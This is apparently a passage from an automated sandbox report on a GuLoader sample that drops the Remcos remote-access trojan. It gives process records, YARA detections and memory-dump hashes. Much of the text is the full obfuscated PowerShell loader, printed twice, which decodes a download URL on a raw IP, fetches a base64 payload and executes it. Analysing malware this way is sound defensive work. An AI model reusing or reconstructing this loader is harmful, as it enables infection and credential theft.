'Santali$TuristagUfologilKlirredoIrretenbRekl,meaGra.erelHotdogg:Velvr sTtrisporhSuddennuIsraelinSmudsbldSolstikrFornyeloParilicuK empess Diaram=Overskr(Komitm TmenusekeFuturabsUnc.mbit Underl-Unf,ozeP Uneffea PhenmitBacktenhUffobru Kar ntn$DrpladeRUsympatePhotomap UnaggrrEna.rigo Reta,ed.iskrimuUtilgngcU,lessue grub.rrKlantereDecayabrS.perim)Mongrel ');while (!$Thundrous) {Catholicate (Mashlin 'Testuds$VilladsgReusserlPar.hypotruantlb DyscraaEfters.lMolenss: FonetiHAustempvCarbarniStted.mdUhygge gToryweeuExitenslMaltrakdBrdekor=Subramo$Ba sangt FikserrNitrateuTalstrkeUnsalva ') ;Catholicate $Samleskinner;Catholicate (Mashlin 'Sto,medSMannosetHaggishaselvflgrHalvpunt Halvto- TilsatSEftestulHje,meleGingerseHeaviespDowerov Luf.hav4Suspect ');Catholicate (Mashlin 'Mo erig$ruberytgUnsavo,l TodkkeoKlunketbP,egrataPippinslTaphane:LithifiTHovedsthFracturuRepri inDays ard BanalirEncycloosyndikauD.rmitisCardais=Flgende(CarnifeTGrandmaeBonbonnsIsogenetTartele-SuccessP alkyriagaa,dejtBulderkhkirking Beguin$Stafe,lREva,oraeStylistpFyresedr arvieaoGastrondE cultuu outcooc sta.ieelehrsmerSkydiveeDiatr pr inolog)Pailowi ') ;Catholicate (Mashlin 'Luftfor$Uptossig Landm lResea,eoFri andbNnsomtgaSurinaml Fjorte:BegivenDPeonageaKlapp,rtFandangcPr,ssiohRes nif=Success$BilinspgDiscut,lKlvere obenc.rebUnderreaKollektl.ormatl:PreimprTRelenteaStantonxUnshameiUngiddyeM rgenlsKl,erru+Miss ur+For.nnv%,apseri$t.rfagsU Sph,ngnAmphisieScolecixJuniorcpU,sortel ykningo anters ReprseiTarnfrhvResidu,eKvind,kl SlimsiyI entif.Couldesc S.acelo Spec ru.ankrolnSa chartSqueezi ') ;$Unclipper=$Unexplosively[$Datch];}$Cafeterieejerne=335771;$Unoccupiedness111=31688;Catholicate (Mashlin 'Greenbo$VideobagMotionsl SoutheopeucitebDialyseaUn.entllHyposta: HomeozDCwtdisrrMglerviaForhaangAffabileFlambeenAfsvedn Kassati=fe ered Retra.sGDiagonaeVanquist Lemmed-ByggesaCPaladseoChaffennBrnefamt Chimerepred.can.eteraktLsehove Skuespi$D.legerRdue ighe ildmanp.fsyrinrAggressoKonfek,dBonbonnu VirilicJ mfruheMecca.br Triumfe AtomisrAmtsraa ');Catholicate (Mashlin 'Hvidsyn$.legnerg Graphol HviledomakrorebUnapp.oaNightc.lRetouch:GennemgER,covera MousinrPhosphotParkinchDisgenisArchiluhMephistiBashingnpreplanePulples Kinkier=Ultramo Teksth[ .halciSKnyttelyRe.oketsGismondtNoelle,eLom espmDess.rt.L ndbruCOmkldnioTalahibn OverspvReorganeRokerinrLegiohat Overby]Puinavi:Decimal:SelectlFNeap,lir fascisoC.mputemGensi iBSammenba eaconsUn.ialbekbspris6 ibatio4tr,lleySUnanimotAalbindrPeltingiGenindkn ges usgBolig.a(Samle,g$Tev ndsDAk.ieavr SurrogaForurengPiaristeSonedeun Connoi) Plasti ');Catholicate (Mashlin 'Nonexec$FadsecogBagsidelS,ymikroB.fjersbSensizeacountywlBrnewor:,rdifasTUnderdih.chateteDeciderttaengeraTestostrSkabertyCardio tBanalismAmativeeForargb Prisstt= Pierce Acryld[PropendS nfacetyskvisnis,carpertResqu.nepa.hetimHi chhi.UdsigtsTMastu,beTripterx ,obilitAmmoc e.Lurer eENrbill nBryskesc Macedoo HerhendDrbtfariUdenomrn Irett gChie.er]Unev.ng:Almisse:OverreaAFort edSjurisdiCRug ginISplitteI,iskuss.UndersaGZooph,te Pe tlytDrni.geSOplandstUnr,vearTraileri ThallonFrserengKollegi( Invent$FramegrEBjlkeh aNiftilyrAlmengrtunstitchSonicats Lyssuvh M lakiiSettimon Licentecoupals)Bullnec ');Catholicate (Mashlin ' S rlig$Mycel ugSucceedldysmerooSemispeb Su picaJosherpl Risq e:N,nguarDDukked aFredninmSiccantpLavemens U.obsekfellaspi.tigmatbDistribsstavelsfChris,io Ud.etarMind tebGramsciiSamlebanGengldtd M.litreLysbil,lFedtsyrs BadutseAgertidrKollektsAgonied=Bubonoc$AkademiTDocentshStudieeeUn hoosta.sishua l,crinrKmperesy S,ineptHusmandmLob teue ermes. GenavnsMes,speu CosmopbSkarpsks Fo niktMarriagr SocialiLaundscnKonsu agSjklera(Beautsi$AftaletCLangluvaVituperf U.paraeMetaportOutsouneRme.glarTeatedbiPuzzledeElectr eCaracoljDebaseseP.stattrOverr snGouverneKizbetj, atakop$ GustavUAfvandrnHavfiskoStu,percElectric Havehuu,ucranepBrdfabriUnem,nceDatidigd Basilin anvis.eBataljes BlazonsObstina1pomegra1kjeldfi1Hypsoph)Forsvrg ');Catholicate $Dampskibsforbindelsers;"
                Imagebase:0x7ff6cb6b0000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1881945266.00000258F5F75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:01:50:03
                Start date:02/07/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6ee680000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:01:50:05
                Start date:02/07/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t"
                Imagebase:0x7ff716980000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:01:50:13
                Start date:02/07/2024
                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSoterioeVirrerusEqui,on) Rigdom ');Catholicate (Mashlin 'telefon$Uncomf gSpoofislHalvfjeosideshabSabiania Soci,llDiverto:Deth,onUGenoplinLivsbeteS.ongilxL,vsfarpDoyzarrlForstuvoHanernesP,ykiatiChar.ervE.ternaeCookedmlm,rdentyF.sions=Residen$ CentraU Brud,un.eshadoc D.wfallUnianguiAlpinisp Grabekp Somm,re,rogenerOmdigtn.Fa vetasVentrikp.obakshlA,veolaiCrojikst Konsta( Brasek$UnderbeGPaaseteeSynapsis.lkenslj ,elegof ChifrytInfraociGen.ancg TribunsUnfussitDiv,rsiesmertinsTypo.ra)Snrlive ');Catholicate (Mashlin 'Blok,lj[Klis erNSnapsefeTapp.mat Reetab.BasiskoS,ormindeExtoll,rKaprifov SstersielektrochomoeopeU prompPpseu,opoPersonaiNonlogin Prema tslippetMStravaia ArbejdnBefriela OrenesgDimercueTyfonsmrBikukul]Estrago:Kanonfo:NavneliSSolkre.eE,travecAgamospuTildragrKortadri Nu,erit TacklyyspriggaPB ikettrChironooDelkoratskae,tgoHistoricMiljre oEcoddamlDispers Landstn=Charpie Loranst[ NewsbeNEnchyleeKurchattRrggent.Balla eSCyanaceeBevidnec dongo uPaperinr .edasci Ac.tyltGiftek,yR,troreP RaymunrElmaal.oAbandontHypnoloo OverarcUtri ulohjernehlMarkedsTIspellcyMonsoonpBali,tieDefendr]Subthri:Syldste:AficionTE captilMurg onsoverhea1 yrefab2Bangalo ');$Unclipper=$Unexplosively[0];$Flourishingly= (Mashlin ' Materi$Kaskadeg odsinlSjl,helo ftersobGun,tigaLonersolSynch,o:SerpentMPu,likueNdringslbarryggoBortratdSpgelsei,induessFejludseReshipm=UomgngeNKoaguleeS.ecifiwLegater-CocoforOUrligtcbReseratjSciaenie bolledcKnobstitOdor.nt TromlebS Aperieyout,abbsAdvantatRyatp,eeLamellamPreexpe. MiddelNn ntheieperistot Shrubl.BundfryWUnobstreNon iscbbrahmanCRegentelMora.doiVlverneeKollagenAnteda,t');$Flourishingly+=$hastigheder[1];Catholicate ($Flourishingly);Catholicate (Mashlin 'lim alk$AfgrdenMSuperpreboolskelhu,rsygo,bessindGringeriZebuernsRis ersetwanaer.IndesneHHundr,de ikseanasubtrakd,aspiste Bi,ephrNonrespsAirplan[Dansemu$KabellgSTolkereeFor undnSkotjsfs.retaniaA.lurintVulcanaiParakeeoCoscetbnUrukueneEphemerrLukewa,]Sp,radi=Magnhi.$chill mSOvercuri Macrurk Reconvh SammeneSkakt kn rigs,ms Noneli ');$Samleskinner=Mashlin 'Myrtilu$AutobioMDe.elopeUdarmerl Anato.o ParlamdtriglyciU,loadusKienanueN.veauo.IndvandDUncoloroSkovbruwindholdnPneuma,lUpthr woOvergana Cotu.adPatientFObje.tiiIfeck.fl Datasee Agency(percept$SidelinUB.learinNicholacPachydelTopiskei rimesypDelftwapErstatneOuteatcrpreflig,C mpute$WilhelmRBarounieRivet ep Brode.rBronchooRielnitd,eallnsuAr,uatecV ldfrte Pe iodr OpmagaeGodtgrerDumbbel)Frerpr ';$Reproducerer=$hastigheder[0];Catholicate (Mashlin 'Santali$TuristagUfologilKlirredoIrretenbRekl,meaGra.erelHotdogg:Velvr sTtrisporhSuddennuIsraelinSmudsbldSolstikrFornyeloParilicuK empess Diaram=Overskr(Komitm TmenusekeFuturabsUnc.mbit Underl-Unf,ozeP Uneffea PhenmitBacktenhUffobru Kar ntn$DrpladeRUsympatePhotomap UnaggrrEna.rigo Reta,ed.iskrimuUtilgngcU,lessue grub.rrKlantereDecayabrS.perim)Mongrel ');while (!$Thundrous) {Catholicate (Mashlin 'Testuds$VilladsgReusserlPar.hypotruantlb DyscraaEfters.lMolenss: FonetiHAustempvCarbarniStted.mdUhygge gToryweeuExitenslMaltrakdBrdekor=Subramo$Ba sangt FikserrNitrateuTalstrkeUnsalva ') ;Catholicate $Samleskinner;Catholicate (Mashlin 'Sto,medSMannosetHaggishaselvflgrHalvpunt Halvto- TilsatSEftestulHje,meleGingerseHeaviespDowerov Luf.hav4Suspect ');Catholicate (Mashlin 'Mo erig$ruberytgUnsavo,l TodkkeoKlunketbP,egrataPippinslTaphane:LithifiTHovedsthFracturuRepri inDays ard BanalirEncycloosyndikauD.rmitisCardais=Flgende(CarnifeTGrandmaeBonbonnsIsogenetTartele-SuccessP alkyriagaa,dejtBulderkhkirking Beguin$Stafe,lREva,oraeStylistpFyresedr arvieaoGastrondE cultuu outcooc sta.ieelehrsmerSkydiveeDiatr pr inolog)Pailowi ') ;Catholicate (Mashlin 'Luftfor$Uptossig Landm lResea,eoFri andbNnsomtgaSurinaml Fjorte:BegivenDPeonageaKlapp,rtFandangcPr,ssiohRes nif=Success$BilinspgDiscut,lKlvere obenc.rebUnderreaKollektl.ormatl:PreimprTRelenteaStantonxUnshameiUngiddyeM rgenlsKl,erru+Miss ur+For.nnv%,apseri$t.rfagsU Sph,ngnAmphisieScolecixJuniorcpU,sortel ykningo anters ReprseiTarnfrhvResidu,eKvind,kl SlimsiyI entif.Couldesc S.acelo Spec ru.ankrolnSa chartSqueezi ') ;$Unclipper=$Unexplosively[$Datch];}$Cafeterieejerne=335771;$Unoccupiedness111=31688;Catholicate (Mashlin 'Greenbo$VideobagMotionsl SoutheopeucitebDialyseaUn.entllHyposta: HomeozDCwtdisrrMglerviaForhaangAffabileFlambeenAfsvedn Kassati=fe ered Retra.sGDiagonaeVanquist Lemmed-ByggesaCPaladseoChaffennBrnefamt Chimerepred.can.eteraktLsehove Skuespi$D.legerRdue ighe ildmanp.fsyrinrAggressoKonfek,dBonbonnu VirilicJ mfruheMecca.br Triumfe AtomisrAmtsraa ');Catholicate (Mashlin 'Hvidsyn$.legnerg Graphol HviledomakrorebUnapp.oaNightc.lRetouch:GennemgER,covera MousinrPhosphotParkinchDisgenisArchiluhMephistiBashingnpreplanePulples Kinkier=Ultramo Teksth[ .halciSKnyttelyRe.oketsGismondtNoelle,eLom espmDess.rt.L ndbruCOmkldnioTalahibn OverspvReorganeRokerinrLegiohat Overby]Puinavi:Decimal:SelectlFNeap,lir fascisoC.mputemGensi iBSammenba eaconsUn.ialbekbspris6 ibatio4tr,lleySUnanimotAalbindrPeltingiGenindkn ges usgBolig.a(Samle,g$Tev ndsDAk.ieavr SurrogaForurengPiaristeSonedeun Connoi) Plasti ');Catholicate (Mashlin 'Nonexec$FadsecogBagsidelS,ymikroB.fjersbSensizeacountywlBrnewor:,rdifasTUnderdih.chateteDeciderttaengeraTestostrSkabertyCardio tBanalismAmativeeForargb Prisstt= Pierce Acryld[PropendS nfacetyskvisnis,carpertResqu.nepa.hetimHi chhi.UdsigtsTMastu,beTripterx ,obilitAmmoc e.Lurer eENrbill nBryskesc Macedoo HerhendDrbtfariUdenomrn Irett gChie.er]Unev.ng:Almisse:OverreaAFort edSjurisdiCRug ginISplitteI,iskuss.UndersaGZooph,te Pe tlytDrni.geSOplandstUnr,vearTraileri ThallonFrserengKollegi( Invent$FramegrEBjlkeh aNiftilyrAlmengrtunstitchSonicats Lyssuvh M lakiiSettimon Licentecoupals)Bullnec ');Catholicate (Mashlin ' S rlig$Mycel ugSucceedldysmerooSemispeb Su picaJosherpl Risq e:N,nguarDDukked aFredninmSiccantpLavemens U.obsekfellaspi.tigmatbDistribsstavelsfChris,io Ud.etarMind tebGramsciiSamlebanGengldtd M.litreLysbil,lFedtsyrs BadutseAgertidrKollektsAgonied=Bubonoc$AkademiTDocentshStudieeeUn hoosta.sishua l,crinrKmperesy S,ineptHusmandmLob teue ermes. GenavnsMes,speu CosmopbSkarpsks Fo niktMarriagr SocialiLaundscnKonsu agSjklera(Beautsi$AftaletCLangluvaVituperf U.paraeMetaportOutsouneRme.glarTeatedbiPuzzledeElectr eCaracoljDebaseseP.stattrOverr snGouverneKizbetj, atakop$ GustavUAfvandrnHavfiskoStu,percElectric Havehuu,ucranepBrdfabriUnem,nceDatidigd Basilin anvis.eBataljes BlazonsObstina1pomegra1kjeldfi1Hypsoph)Forsvrg ');Catholicate $Dampskibsforbindelsers;"
                Imagebase:0xaa0000
                File size:433'152 bytes
                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1770345061.0000000008770000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1765124979.0000000005C63000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1770777282.0000000008F9F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Target ID:6
                Start time:01:50:13
                Start date:02/07/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t"
                Imagebase:0xa40000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:01:50:30
                Start date:02/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                Imagebase:0xc30000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2642932764.00000000003BF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.2645737177.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:false

                Target ID:11
                Start time:01:50:49
                Start date:02/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum"
                Imagebase:0xc30000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:12
                Start time:01:50:49
                Start date:02/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wwudnmvruyjoifwgeowdizhtynh"
                Imagebase:0xc30000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:13
                Start time:01:50:49
                Start date:02/07/2024
                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyzoofgtigbtltskvyiftmucztzsei"
                Imagebase:0xc30000
                File size:516'608 bytes
                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Reset < >
                  Memory Dump Source
                  • Source File: 00000002.00000002.1897596844.00007FFB4B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B120000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b120000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 10896c4feb6cc3267f5d860c1bac96ce6f6b7d865c3043d1b2aaf2922530e221
                  • Instruction ID: e1ee02a7240a6d596fd012e1f1ede3abd1242277d1b7ba6ab86e57d842c232d0
                  • Opcode Fuzzy Hash: 10896c4feb6cc3267f5d860c1bac96ce6f6b7d865c3043d1b2aaf2922530e221
                  • Instruction Fuzzy Hash: 80F1A67051CA4D8FEBA9EF28C855BEA77D1FF54310F04826EE84DC7291DB34A9458B82
                  Memory Dump Source
                  • Source File: 00000002.00000002.1897596844.00007FFB4B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B120000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b120000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 37605b58cab68af8626810fa30f2cce89a81319c8fd52637f43dee360f0c888e
                  • Instruction ID: 55b1f36f1539f9745ca315628566f54a4759bfeda182f256b49f16c8daeec69c
                  • Opcode Fuzzy Hash: 37605b58cab68af8626810fa30f2cce89a81319c8fd52637f43dee360f0c888e
                  • Instruction Fuzzy Hash: 87E1B47051CA8E8FEBA9EF28C8567E977D1FF54310F04826AD84DC7291DE7899418B82
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.1897596844.00007FFB4B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B120000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b120000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: `C5K
                  • API String ID: 0-729891112
                  • Opcode ID: 0d755d7bb1b7458b0801c33802779e377449d62140deecf8369d52f43b8c5632
                  • Instruction ID: 009de7e3c1368917868c8ab3d436efde269c78a80d298d774b1948de21d6b422
                  • Opcode Fuzzy Hash: 0d755d7bb1b7458b0801c33802779e377449d62140deecf8369d52f43b8c5632
                  • Instruction Fuzzy Hash: F8D1E771A1CA4D8FEB98EF6CC450AED77E1FFA8304F144276D549D7256CE34A8428B81
                  Memory Dump Source
                  • Source File: 00000002.00000002.1898400276.00007FFB4B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b1f0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ce648489dbcd61477ea29dc0815d7eac70d07ceae6917da5187bf7188d4deecc
                  • Instruction ID: 3ab901404784da0bd5aa96c0d5544feee0a774adb709e56b343f29bed8876197
                  • Opcode Fuzzy Hash: ce648489dbcd61477ea29dc0815d7eac70d07ceae6917da5187bf7188d4deecc
                  • Instruction Fuzzy Hash: 4EE147B291DA8A4FEB95EF78C8651B87BD1EF49324B1841BED54DC31E2CE18AC01CB41
                  Memory Dump Source
                  • Source File: 00000002.00000002.1898400276.00007FFB4B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b1f0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d73d745082aaf47975160737f8d85699616daa180ed467c339f772a94d120a7d
                  • Instruction ID: f16dc59385d1a85ce049e27f20dbe9cdc56d57486eb19ff7d9def19aee10c16d
                  • Opcode Fuzzy Hash: d73d745082aaf47975160737f8d85699616daa180ed467c339f772a94d120a7d
                  • Instruction Fuzzy Hash: D0D156A2E2DA8A0FE796AFBC98541B47BD1EF55224B1841FAD14CC70E3DD089C05CB81
                  Memory Dump Source
                  • Source File: 00000002.00000002.1897596844.00007FFB4B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B120000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b120000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0c89650a57bec17a405ee5ed360eabfb4101cf1dd7373bbc27a7197c57a02fbe
                  • Instruction ID: 3a7f526fa741c72ec2053a9181f0b38dbe29b1f96036bf2b8f4f95a540f540e7
                  • Opcode Fuzzy Hash: 0c89650a57bec17a405ee5ed360eabfb4101cf1dd7373bbc27a7197c57a02fbe
                  • Instruction Fuzzy Hash: 0A51676260E6899FD71ABB3CE8554F47BE0DF4232570842FBD189CB093DC19688B87A1
                  Memory Dump Source
                  • Source File: 00000002.00000002.1898400276.00007FFB4B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b1f0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c6e6423e84b79c1cb199896d6d1cec4994806cf7b513ada6d58881f728628e35
                  • Instruction ID: e5eeec104865ff791b9ae625cb6183efb275a782b3e875f76c19ef2c427351fa
                  • Opcode Fuzzy Hash: c6e6423e84b79c1cb199896d6d1cec4994806cf7b513ada6d58881f728628e35
                  • Instruction Fuzzy Hash: 764127A2D2DA8A4FE799EF78C8511B8A6D2EF88714F5841BDD54DC31E2CE18AC41CB41
                  Memory Dump Source
                  • Source File: 00000002.00000002.1898400276.00007FFB4B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B1F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b1f0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c02bcfe29019d146afbcbaecc4c420950e505e79cbc10e9c304aa1b1f66f1607
                  • Instruction ID: 37fac1a7f33a581d64c9c669d69a9dff10c69120f043c2430d93d14791762ffd
                  • Opcode Fuzzy Hash: c02bcfe29019d146afbcbaecc4c420950e505e79cbc10e9c304aa1b1f66f1607
                  • Instruction Fuzzy Hash: 8A3159D2D3EA870BF39BAE7CD9511B8A5C1EF44724F6841B9D54DD31D2DD086C11CA82
                  Memory Dump Source
                  • Source File: 00000002.00000002.1897596844.00007FFB4B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B120000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b120000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                  • Instruction ID: 857d6c4fda09c5af6fc1c296110453d13f53d9f9a9f523055778fc13feab127b
                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                  • Instruction Fuzzy Hash: D901677111CB0C8FD748EF0CE451AA5B7E0FB95364F10056EE58AC3665DA36E882CB46
                  Memory Dump Source
                  • Source File: 00000002.00000002.1897596844.00007FFB4B120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B120000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ffb4b120000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad5aac15e186f9a301af36ef1ba5798178c7e76d7d9b45bf3fd8e94b3c25e16b
                  • Instruction ID: 61e9f0534d91caec19cda43802ee6d2ec247206866b89d913bc298875dafb5fa
